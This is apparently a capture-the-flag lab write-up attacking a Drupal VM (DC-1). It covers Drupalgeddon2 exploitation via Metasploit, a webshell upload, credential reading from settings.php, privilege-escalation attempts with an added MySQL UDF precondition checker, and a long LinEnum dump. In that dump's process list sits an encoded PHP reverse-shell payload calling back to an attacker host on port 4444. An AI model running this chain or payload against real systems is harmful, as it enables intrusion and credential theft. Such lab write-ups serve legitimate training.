Brought up the target VM. In bridged mode I could not see its IP, so I swept the /24 (the C segment) with masscan, probing ports 80 and 8080.
The host that answered was running Drupal.
Pulled up msf and searched for Drupal modules.
Tried the most recent exploit first:
exploit/unix/webapp/drupal_drupalgeddon2
This module targets CVE-2018-7600 (SA-CORE-2018-002, "Drupalgeddon2"), an unauthenticated remote code execution bug in the Drupal Form API. It is the right pick only when the site is below the fixed release for its branch (7.58, 8.3.9, 8.4.6 or 8.5.1), which is worth confirming before firing it.
The exploit succeeded and returned a meterpreter shell.
Did some basic enumeration.
We are not root (the shell runs as www-data), so the next job is privilege escalation. I started with the usual Linux privesc checker:
./Linux_Exploit_Suggester.pl
It returned no usable suggestions, so I tried searchsploit against kernel 3.2.0.
Caveat: "3.2.0" is only the Debian ABI name of the kernel package; the running kernel is 3.2.102-1 (see the uname output in the LinEnum report below), with years of security fixes backported, and the target is 32-bit i686. Exploits searchsploit lists for an unpatched 3.2.0 are therefore mostly already closed, and anything you do compile has to be built for i686.
The exp.c highlighted in the red box in the screenshot failed to compile, so this escalation attempt failed.
Uploaded a China Chopper (菜刀) webshell, shell.php, to browse files more conveniently.
Next idea: MySQL UDF privilege escalation.
For that I used the webshell to look for the database credentials, to see whether the DB account is a privileged one.
In
/var/www/sites/default/settings.php
I found the account and password, but it did not look like a high-privilege account.
Tried connecting with it.
It is not root. Two things decide whether UDF escalation is worth pursuing: the account needs the FILE privilege (or ALL PRIVILEGES) at global scope to drop a shared object into plugin_dir, and the UDF only runs as whatever OS user mysqld runs as. In the process list below, mysqld is started with --user=mysql, so even a successful UDF would give code execution as mysql, not root.
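The checks a practitioner wants to run before investing in a UDF build, as an added example (not code from the write-up): it parses SHOW GRANTS and SHOW VARIABLES output plus the mysqld line from ps aux, and reports whether the account can plant a UDF at all and which OS user the resulting code would run as. The grants and variable rows are constructed; the ps line is the mysqld entry from the LinEnum report below, which shows --user=mysql.

```python
# Added example (not from the original write-up): pre-flight check for a MySQL UDF
# privilege escalation, run before building any payload. It parses SHOW GRANTS and
# SHOW VARIABLES output plus the mysqld line from ps, and reports whether the account
# can plant a UDF at all and which OS user the resulting code would run as. The grants
# and variables below are constructed; the ps line mirrors the mysqld entry in the
# LinEnum output (mysqld started with --user=mysql).
import re

# Constructed SHOW GRANTS output for a typical web-app DB account: USAGE only at
# global scope, full rights on its own schema. Nothing here allows writing files.
GRANTS_WEBAPP = """\
GRANT USAGE ON *.* TO 'dbuser'@'localhost' IDENTIFIED BY PASSWORD '*0123456789ABCDEF0123456789ABCDEF01234567'
GRANT ALL PRIVILEGES ON `drupaldb`.* TO 'dbuser'@'localhost'
"""

# Constructed output for a superuser account, for comparison.
GRANTS_ROOT = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' IDENTIFIED BY PASSWORD '*...' WITH GRANT OPTION\n"

# Constructed SHOW VARIABLES rows (tab-separated, as the mysql client prints with -B).
VARIABLES = "Variable_name\tValue\nplugin_dir\t/usr/lib/mysql/plugin/\nsecure_file_priv\t\n"

# ps aux line for the database server, as seen in the LinEnum report.
MYSQLD_PS = ("mysql 2831 0.0 4.7 329380 49184 ? Sl 00:08 0:02 /usr/sbin/mysqld --basedir=/usr "
             "--datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql "
             "--pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306")

def parse_global_grants(show_grants_output):
    """Privilege names granted ON *.* (global scope). Schema-level grants are ignored:
    planting a UDF needs FILE (to write the .so) and INSERT on mysql.func, both global."""
    privs = set()
    for line in show_grants_output.splitlines():
        m = re.match(r"GRANT (.+?) ON \*\.\* TO ", line.strip())
        if m:
            privs.update(p.strip().upper() for p in m.group(1).split(","))
    return privs

def parse_variables(show_variables_output):
    """'Variable_name<TAB>Value' rows into a dict; the header row is skipped."""
    variables = {}
    for line in show_variables_output.splitlines():
        parts = line.split("\t")
        if len(parts) == 2 and parts[0] != "Variable_name":
            variables[parts[0]] = parts[1]
    return variables

def secure_file_priv_allows(secure_file_priv, plugin_dir):
    """Can SELECT ... INTO DUMPFILE write into plugin_dir under this setting?
    Empty means unrestricted (the MySQL 5.5 default); NULL disables file I/O entirely;
    a directory restricts writes to that tree."""
    if secure_file_priv == "":
        return True
    if secure_file_priv.upper() == "NULL":
        return False
    return plugin_dir.rstrip("/").startswith(secure_file_priv.rstrip("/"))

def mysqld_user(ps_line):
    """OS user mysqld runs as: --user= if present, else the USER column of ps aux."""
    m = re.search(r"--user=(\S+)", ps_line)
    return m.group(1) if m else ps_line.split()[0]

def udf_assessment(show_grants_output, show_variables_output, ps_line):
    """Preconditions for a UDF and what it would actually buy."""
    privs = parse_global_grants(show_grants_output)
    variables = parse_variables(show_variables_output)
    plugin_dir = variables.get("plugin_dir", "")
    has_file = "ALL PRIVILEGES" in privs or {"FILE", "INSERT"} <= privs
    writable = secure_file_priv_allows(variables.get("secure_file_priv", ""), plugin_dir)
    runs_as = mysqld_user(ps_line)
    return {
        "global_privs": sorted(privs),
        "can_plant_udf": has_file and writable,
        "plugin_dir": plugin_dir,
        "runs_as": runs_as,
        "gives_root": has_file and writable and runs_as == "root",
    }

if __name__ == "__main__":
    for name, grants in (("webapp account", GRANTS_WEBAPP), ("root account", GRANTS_ROOT)):
        print(name, udf_assessment(grants, VARIABLES, MYSQLD_PS))
```

Run against the constructed inputs, the web-app account cannot plant a UDF at all, and even the root DB account would only yield code execution as mysql, which is the outcome the write-up's attempt was heading for.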
Next I ran LinEnum.sh, another Linux privesc enumeration script, to look for weak spots:
#########################################################
#   Local Linux Enumeration & Privilege Escalation Script   #
#########################################################
# www.rebootuser.com
# version 0.95

[-] Debug Info
[+] Thorough tests = Disabled

Scan started at:
Tue May 7 01:08:48 AEST 2019

### SYSTEM ##############################################
[-] Kernel information:
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686 GNU/Linux

[-] Kernel information (continued):
Linux version 3.2.0-6-486 (debian-kernel@lists.debian.org) (gcc version 4.9.2 (Debian 4.9.2-10+deb7u1) ) #1 Debian 3.2.102-1

[-] Specific release information:
PRETTY_NAME="Debian GNU/Linux 7 (wheezy)"
NAME="Debian GNU/Linux"
VERSION_ID="7"
VERSION="7 (wheezy)"
ID=debian
ANSI_COLOR="1;31"
HOME_URL="http://www.debian.org/"
SUPPORT_URL="http://www.debian.org/support/"
BUG_REPORT_URL="http://bugs.debian.org/"

[-] Hostname:
DC-1

### USER/GROUP ##########################################
[-] Current user/group info:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[-] Users that have previously logged onto the system:
Username Port From Latest
root tty1 Thu Feb 28 12:10:51 +1000 2019

[-] Who else is logged on:
01:08:48 up 1:00, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT

[-] Group memberships:
uid=0(root) gid=0(root) groups=0(root)
uid=1(daemon) gid=1(daemon) groups=1(daemon)
uid=2(bin) gid=2(bin) groups=2(bin)
uid=3(sys) gid=3(sys) groups=3(sys)
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
uid=5(games) gid=60(games) groups=60(games)
uid=6(man) gid=12(man) groups=12(man)
uid=7(lp) gid=7(lp) groups=7(lp)
uid=8(mail) gid=8(mail) groups=8(mail)
uid=9(news) gid=9(news) groups=9(news)
uid=10(uucp) gid=10(uucp) groups=10(uucp)
uid=13(proxy) gid=13(proxy) groups=13(proxy)
uid=33(www-data) gid=33(www-data) groups=33(www-data)
uid=34(backup) gid=34(backup) groups=34(backup)
uid=38(list) gid=38(list) groups=38(list)
uid=39(irc) gid=39(irc) groups=39(irc)
uid=41(gnats) gid=41(gnats) groups=41(gnats)
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
uid=100(libuuid) gid=101(libuuid) groups=101(libuuid)
uid=101(Debian-exim) gid=104(Debian-exim) groups=104(Debian-exim)
uid=102(statd) gid=65534(nogroup) groups=65534(nogroup)
uid=103(messagebus) gid=107(messagebus) groups=107(messagebus)
uid=104(sshd) gid=65534(nogroup) groups=65534(nogroup)
uid=105(mysql) gid=109(mysql) groups=109(mysql)
uid=1001(flag4) gid=1001(flag4) groups=1001(flag4)

[-] Contents of /etc/passwd:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
Debian-exim:x:101:104::/var/spool/exim4:/bin/false
statd:x:102:65534::/var/lib/nfs:/bin/false
messagebus:x:103:107::/var/run/dbus:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:109:MySQL Server,,,:/nonexistent:/bin/false
flag4:x:1001:1001:Flag4,,,:/home/flag4:/bin/bash

[-] Super user account(s):
root

[-] Are permissions on /home directories lax:
total 12K
drwxr-xr-x 3 root root 4.0K Feb 19 23:51 .
drwxr-xr-x 23 root root 4.0K Feb 19 22:34 ..
drwxr-xr-x 2 flag4 flag4 4.0K Feb 19 23:28 flag4

[-] Root is allowed to login via SSH:
PermitRootLogin yes

### ENVIRONMENTAL #######################################
[-] Environment information:
APACHE_PID_FILE=/var/run/apache2.pid
APACHE_RUN_USER=www-data
APACHE_LOG_DIR=/var/log/apache2
PATH=/usr/local/bin:/usr/bin:/bin
PWD=/var/www
APACHE_RUN_GROUP=www-data
LANG=C
SHLVL=1
APACHE_LOCK_DIR=/var/lock/apache2
APACHE_RUN_DIR=/var/run/apache2
_=/usr/bin/env

[-] Path information:
/usr/local/bin:/usr/bin:/bin

[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash

[-] Current umask value:
0022
u=rwx,g=rx,o=rx

[-] umask value as specified in /etc/login.defs:
UMASK 022

[-] Password and storage information:
PASS_MAX_DAYS 99999
PASS_MIN_DAYS 0
PASS_WARN_AGE 7
ENCRYPT_METHOD SHA512

### JOBS/TASKS ##########################################
[-] Cron jobs:
-rw-r--r-- 1 root root 722 Jul 4 2012 /etc/crontab

/etc/cron.d:
total 16
drwxr-xr-x 2 root root 4096 Feb 19 23:01 .
drwxr-xr-x 85 root root 4096 May 7 00:08 ..
-rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder
-rw-r--r-- 1 root root 510 May 10 2018 php5

/etc/cron.daily:
total 68
drwxr-xr-x 2 root root 4096 Feb 19 23:01 .
drwxr-xr-x 85 root root 4096 May 7 00:08 ..
-rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder
-rwxr-xr-x 1 root root 633 May 30 2018 apache2
-rwxr-xr-x 1 root root 14985 Oct 24 2014 apt
-rwxr-xr-x 1 root root 314 Nov 5 2012 aptitude
-rwxr-xr-x 1 root root 355 Jun 11 2012 bsdmainutils
-rwxr-xr-x 1 root root 256 May 3 2016 dpkg
-rwxr-xr-x 1 root root 4125 Feb 11 2018 exim4-base
-rwxr-xr-x 1 root root 89 May 17 2012 logrotate
-rwxr-xr-x 1 root root 1365 Jun 19 2012 man-db
-rwxr-xr-x 1 root root 606 Sep 25 2010 mlocate
-rwxr-xr-x 1 root root 249 May 26 2012 passwd

/etc/cron.hourly:
total 12
drwxr-xr-x 2 root root 4096 Feb 19 22:25 .
drwxr-xr-x 85 root root 4096 May 7 00:08 ..
-rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder

/etc/cron.monthly:
total 12
drwxr-xr-x 2 root root 4096 Feb 19 22:25 .
drwxr-xr-x 85 root root 4096 May 7 00:08 ..
-rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder

/etc/cron.weekly:
total 16
drwxr-xr-x 2 root root 4096 Feb 19 22:25 .
drwxr-xr-x 85 root root 4096 May 7 00:08 ..
-rw-r--r-- 1 root root 102 Jul 4 2012 .placeholder
-rwxr-xr-x 1 root root 907 Jun 19 2012 man-db

[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

### NETWORKING ##########################################
[-] Network and IP info:
eth0 Link encap:Ethernet HWaddr 00:0c:29:d1:f4:98
inet addr:192.168.16.107 Bcast:192.168.16.255 Mask:255.255.255.0
inet6 addr: fe80::20c:29ff:fed1:f498/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:8702 errors:0 dropped:0 overruns:0 frame:0
TX packets:3009 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:1325354 (1.2 MiB) TX bytes:1103771 (1.0 MiB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:50 errors:0 dropped:0 overruns:0 frame:0
TX packets:50 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:4852 (4.7 KiB) TX bytes:4852 (4.7 KiB)

[-] ARP history:
192.168.16.254 dev eth0 lladdr 00:22:aa:d0:dd:95 REACHABLE
192.168.16.112 dev eth0 lladdr f0:18:98:6b:ed:5b REACHABLE

[-] Nameserver(s):
nameserver 192.168.16.254
nameserver 0.0.0.0

[-] Default route:
default via 192.168.16.254 dev eth0

[-] Listening TCP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:25 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:40858 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:3306 0.0.0.0:* LISTEN -
tcp 0 0 0.0.0.0:111 0.0.0.0:* LISTEN -
tcp 0 480 192.168.16.107:33469 192.168.16.112:4444 ESTABLISHED 3406/php
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 ::1:25 :::* LISTEN -
tcp6 0 0 :::34190 :::* LISTEN -
tcp6 0 0 :::111 :::* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 192.168.16.107:80 192.168.16.112:52090 TIME_WAIT -
tcp6 1 0 192.168.16.107:80 192.168.16.112:63539 CLOSE_WAIT -

[-] Listening UDP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:59942 0.0.0.0:* -
udp 0 0 0.0.0.0:68 0.0.0.0:* -
udp 0 0 0.0.0.0:111 0.0.0.0:* -
udp 0 0 0.0.0.0:769 0.0.0.0:* -
udp 0 0 127.0.0.1:801 0.0.0.0:* -
udp 0 0 0.0.0.0:21881 0.0.0.0:* -
udp6 0 0 :::52815 :::* -
udp6 0 0 :::28256 :::* -
udp6 0 0 :::111 :::* -
udp6 0 0 :::769 :::* -

### SERVICES #############################################
[-] Running processes:
USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
root 1 0.0 0.0 2296 780 ? Ss 00:08 0:01 init [2]
root 2 0.0 0.0 0 0 ? S 00:08 0:00 [kthreadd]
root 3 0.0 0.0 0 0 ? S 00:08 0:00 [ksoftirqd/0]
root 4 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/0:0]
root 6 0.0 0.0 0 0 ? S 00:08 0:00 [watchdog/0]
root 7 0.0 0.0 0 0 ? S< 00:08 0:00 [cpuset]
root 8 0.0 0.0 0 0 ? S< 00:08 0:00 [khelper]
root 9 0.0 0.0 0 0 ? S 00:08 0:00 [kdevtmpfs]
root 10 0.0 0.0 0 0 ? S< 00:08 0:00 [netns]
root 11 0.0 0.0 0 0 ? S 00:08 0:00 [sync_supers]
root 12 0.0 0.0 0 0 ? S 00:08 0:00 [bdi-default]
root 13 0.0 0.0 0 0 ? S< 00:08 0:00 [kintegrityd]
root 14 0.0 0.0 0 0 ? S< 00:08 0:00 [kblockd]
root 15 0.0 0.0 0 0 ? S 00:08 0:00 [khungtaskd]
root 16 0.0 0.0 0 0 ? S 00:08 0:00 [kswapd0]
root 17 0.0 0.0 0 0 ? SN 00:08 0:00 [ksmd]
root 18 0.0 0.0 0 0 ? S 00:08 0:00 [fsnotify_mark]
root 19 0.0 0.0 0 0 ? S< 00:08 0:00 [crypto]
root 95 0.0 0.0 0 0 ? S 00:08 0:00 [khubd]
root 105 0.0 0.0 0 0 ? S< 00:08 0:00 [ata_sff]
root 115 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_0]
root 125 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_1]
root 134 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_2]
root 135 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_3]
root 136 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_4]
root 137 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_5]
root 138 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_6]
root 139 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_7]
root 140 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_8]
root 141 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_9]
root 142 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_10]
root 143 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_11]
root 144 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_12]
root 145 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_13]
root 146 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_14]
root 147 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_15]
root 148 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_16]
root 149 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_17]
root 150 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_18]
root 151 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_19]
root 152 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_20]
root 153 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_21]
root 154 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_22]
root 155 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_23]
root 156 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_24]
root 157 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_25]
root 158 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_26]
root 159 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_27]
root 160 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_28]
root 161 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_29]
root 162 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_30]
root 163 0.0 0.0 0 0 ? S 00:08 0:00 [scsi_eh_31]
root 190 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/u:29]
root 191 0.0 0.0 0 0 ? S 00:08 0:00 [kworker/u:30]
root 308 0.0 0.0 0 0 ? S 00:08 0:00 [jbd2/sda1-8]
root 309 0.0 0.0 0 0 ? S< 00:08 0:00 [ext4-dio-unwrit]
root 458 0.0 0.1 2688 1244 ? Ss 00:08 0:00 udevd --daemon
root 543 0.0 0.0 0 0 ? S< 00:08 0:00 [ttm_swap]
root 699 0.0 0.0 0 0 ? S< 00:08 0:00 [kpsmoused]
root 1866 0.0 0.0 2388 904 ? Ss 00:08 0:00 /sbin/rpcbind -w
statd 1897 0.0 0.1 2660 1280 ? Ss 00:08 0:00 /sbin/rpc.statd
root 1902 0.0 0.0 2684 888 ? S 00:08 0:00 udevd --daemon
root 1903 0.0 0.0 0 0 ? S< 00:08 0:00 [rpciod]
root 1905 0.0 0.0 0 0 ? S< 00:08 0:00 [nfsiod]
root 1912 0.0 0.0 2592 568 ? Ss 00:08 0:00 /usr/sbin/rpc.idmapd
root 2215 0.0 0.2 28352 2080 ? Sl 00:08 0:00 /usr/sbin/rsyslogd -c5
root 2267 0.0 0.0 1892 608 ? Ss 00:08 0:00 /usr/sbin/acpid
root 2303 0.0 0.8 43680 8928 ? Ss 00:08 0:00 /usr/sbin/apache2 -k start
daemon 2347 0.0 0.0 2168 316 ? Ss 00:08 0:00 /usr/sbin/atd
103 2353 0.0 0.0 3032 644 ? Ss 00:08 0:00 /usr/bin/dbus-daemon --system
www-data 2381 0.0 1.3 48448 14420 ? S 00:08 0:00 /usr/sbin/apache2 -k start
www-data 2382 0.0 1.2 47424 13408 ? S 00:08 0:00 /usr/sbin/apache2 -k start
www-data 2383 0.0 1.4 47676 14836 ? S 00:08 0:01 /usr/sbin/apache2 -k start
www-data 2384 0.0 1.1 46148 12080 ? S 00:08 0:00 /usr/sbin/apache2 -k start
root 2438 0.0 0.0 3852 988 ? Ss 00:08 0:00 /usr/sbin/cron
root 2493 0.0 0.0 1948 588 ? S 00:08 0:00 /bin/sh /usr/bin/mysqld_safe
mysql 2831 0.0 4.7 329380 49184 ? Sl 00:08 0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306
root 2832 0.0 0.0 1868 604 ? S 00:08 0:00 logger -t mysqld -p daemon.error
101 3228 0.0 0.0 7424 992 ? Ss 00:08 0:00 /usr/sbin/exim4 -bd -q30m
root 3281 0.0 0.0 3796 840 tty2 Ss+ 00:08 0:00 /sbin/getty 38400 tty2
root 3282 0.0 0.0 3796 836 tty3 Ss+ 00:08 0:00 /sbin/getty 38400 tty3
root 3283 0.0 0.0 3796 840 tty4 Ss+ 00:08 0:00 /sbin/getty 38400 tty4
root 3284 0.0 0.0 3796 836 tty5 Ss+ 00:08 0:00 /sbin/getty 38400 tty5
root 3285 0.0 0.0 3796 840 tty6 Ss+ 00:08 0:00 /sbin/getty 38400 tty6
root 3287 0.0 0.0 0 0 ? S 00:08 0:00 [flush-8:0]
root 3298 0.0 0.2 5196 2320 ? Ss 00:08 0:00 dhclient -v -pf /run/dhclient.eth0.pid -lf /var/lib/dhcp/dhclient.eth0.leases eth0
root 3339 0.0 0.1 6496 1076 ? Ss 00:08 0:00 /usr/sbin/sshd
root 3354 0.0 0.0 3796 840 tty1 Ss+ 00:09 0:00 /sbin/getty 38400 tty1
www-data 3358 0.0 1.5 49688 15620 ? S 00:18 0:00 /usr/sbin/apache2 -k start
www-data 3360 0.0 1.1 45892 11832 ? S 00:18 0:00 /usr/sbin/apache2 -k start
www-data 3361 0.0 1.6 51624 16812 ? S 00:18 0:00 /usr/sbin/apache2 -k start
www-data 3381 0.0 1.1 45892 11828 ? S 00:32 0:00 /usr/sbin/apache2 -k start
www-data 3385 0.0 1.2 47436 13392 ? S 00:32 0:00 /usr/sbin/apache2 -k start
www-data 3386 0.0 1.2 47416 13320 ? S 00:32 0:00 /usr/sbin/apache2 -k start
www-data 3405 0.0 0.0 1948 540 ? S 00:39 0:00 sh -c php -r 'eval(base64_decode(...KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));'
www-data 3406 0.0 0.8 41132 9032 ? S 00:39 0:01 php -r eval(base64_decode(Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTYuMTEyJzsgJHBvcnQgPSA0NDQ0OyBpZiAoKCRmID0gJ3N0cmVhbV9zb2NrZXRfY2xpZW50JykgJiYgaXNfY2FsbGFibGUoJGYpKSB7ICRzID0gJGYoInRjcDovL3skaXB9OnskcG9ydH0iKTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ2Zzb2Nrb3BlbicpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCRpcCwgJHBvcnQpOyAkc190eXBlID0gJ3N0cmVhbSc7IH0gaWYgKCEkcyAmJiAoJGYgPSAnc29ja2V0X2NyZWF0ZScpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKEFGX0lORVQsIFNPQ0tfU1RSRUFNLCBTT0xfVENQKTsgJHJlcyA9IEBzb2NrZXRfY29ubmVjdCgkcywgJGlwLCAkcG9ydCk7IGlmICghJHJlcykgeyBkaWUoKTsgfSAkc190eXBlID0gJ3NvY2tldCc7IH0gaWYgKCEkc190eXBlKSB7IGRpZSgnbm8gc29ja2V0IGZ1bmNzJyk7IH0gaWYgKCEkcykgeyBkaWUoJ25vIHNvY2tldCcpOyB9IHN3aXRjaCAoJHNfdHlwZSkgeyBjYXNlICdzdHJlYW0nOiAkbGVuID0gZnJlYWQoJHMsIDQpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGxlbiA9IHNvY2tldF9yZWFkKCRzLCA0KTsgYnJlYWs7IH0gaWYgKCEkbGVuKSB7IGRpZSgpOyB9ICRhID0gdW5wYWNr.KCJObGVuIiwgJGxlbik7ICRsZW4gPSAkYVsnbGVuJ107ICRiID0gJyc7IHdoaWxlIChzdHJsZW4oJGIpIDwgJGxlbikgeyBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGIgLj0gZnJlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyBjYXNlICdzb2NrZXQnOiAkYiAuPSBzb2NrZXRfcmVhZCgkcywgJGxlbi1zdHJsZW4oJGIpKTsgYnJlYWs7IH0gfSAkR0xPQkFMU1snbXNnc29jayddID0gJHM7ICRHTE9CQUxTWydtc2dzb2NrX3R5cGUnXSA9ICRzX3R5cGU7IGlmIChleHRlbnNpb25fbG9hZGVkKCdzdWhvc2luJykgJiYgaW5pX2dldCgnc3Vob3Npbi5leGVjdXRvci5kaXNhYmxlX2V2YWwnKSkgeyAkc3Vob3Npbl9ieXBhc3M9Y3JlYXRlX2Z1bmN0aW9uKCcnLCAkYik7ICRzdWhvc2luX2J5cGFzcygpOyB9IGVsc2UgeyBldmFsKCRiKTsgfSBkaWUoKTs));
www-data 3408 0.0 0.0 1948 520 ? S 00:40 0:00 sh -c /bin/sh
www-data 3409 0.0 0.0 1948 576 ? S 00:40 0:00 /bin/sh
root 3488 0.0 0.0 0 0 ? S 01:01 0:00 [kworker/0:1]
root 4393 0.0 0.0 0 0 ? S 01:07 0:00 [kworker/0:2]
www-data 4398 0.0 0.1 3500 1764 ? S 01:08 0:00 /bin/bash ./LinEnum.sh
www-data 4399 0.0 0.1 3552 1380 ? S 01:08 0:00 /bin/bash ./LinEnum.sh
www-data 4400 0.0 0.0 1876 452 ? S 01:08 0:00 tee -a
www-data 4570 0.0 0.1 3536 1092 ? S 01:08 0:00 /bin/bash ./LinEnum.sh
www-data 4571 0.0 0.0 2832 996 ? R 01:08 0:00 ps aux

[-] Process binaries and associated permissions (from above list):
-rwxr-xr-x 1 root root 941252 Oct 27 2016 /bin/bash
lrwxrwxrwx 1 root root 4 Mar 1 2012 /bin/sh -> dash
-rwxr-xr-x 2 root root 26684 Dec 10 2012 /sbin/getty
-rwxr-xr-x 1 root root 68180 May 22 2013 /sbin/rpc.statd
-rwxr-xr-x 1 root root 42836 May 10 2017 /sbin/rpcbind
-rwxr-xr-x 1 root root 436576 Feb 10 2015 /usr/bin/dbus-daemon
